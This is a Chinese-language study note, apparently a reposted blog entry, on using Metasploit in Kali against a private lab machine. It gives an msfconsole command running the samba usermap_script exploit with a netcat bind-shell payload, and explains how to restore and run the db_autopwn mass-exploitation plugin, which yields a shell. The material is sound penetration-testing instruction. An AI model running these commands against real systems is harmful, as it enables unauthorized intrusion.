metasploit学习笔记2

1.阅读老资料的困惑

老资料里一般是根据BT5整理的，kali里的metasploit比较新，不太一样，这里整理一下。

a)msfcli被整合进msfconsole的参数里：

老指令：

#msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat RHOST=192.168.200.129 E

新指令：

#msfconsole -x "use exploit/multi/samba/usermap_script; set RHOST 192.168.200.129; set PAYLOADcmd/unix/bind_netcat; [set LHOST IP;] run"

b)msfpayload、msfencode被整合到msfvenom里：

老指令：

msfpayload -l        #查看所有攻击载荷

msfencode -l         #查看所有编码器

新指令只需一条指令即可：

msfvenom -l payloads,encoders

下图是msfvenom的参数说明：

c)db_autopwn自动渗透脚本被删除

据说是由于该脚本虽然使渗透傻瓜化，但是智能不高，并且造成的负载不小，容易被发现，所以删掉了。

目前替代的方法是可以使用metasploit的一些自动化插件和脚本，但是更好的方法还是自己选择合适的脚本和载荷，使负载变小，效率更高。

https://github.com/rapid7/metasploit-framework/tree/master/plugins

2.db_autopwn傻瓜化测试

虽然db_autopwn被删掉了，但是可以手工恢复。

https://github.com/PsychoSpy/metasploit-framework/blob/autopwn-modules/plugins/db_autopwn.rb

源代码复制下来，保存为db_autopwn.rb文件，复制到/usr/share/metasploit-framwork/plugins/中，然后执行加载

#msf>load db_autopwn

渗透测试：

a）扫描测试机

#msf>db_nmap -v -A 192.168.200.129

--测试机的扫描结果会自动存放如Postgresql数据库中

b)查看扫描结果

c）自动测试

#msf>db_autopwn -t -p -r -e          ----负载不小，1000多个脚本都会跑一遍，需要不少时间，好在成功了一个session。

d)连接会话并测试

会话连接已经成功，但user是www-data（敲错的指令，请自动忽略），不是root，没关系，至少证明db_autopwn还是管用的。

转载：http://www.jianshu.com/p/6c600bf396a5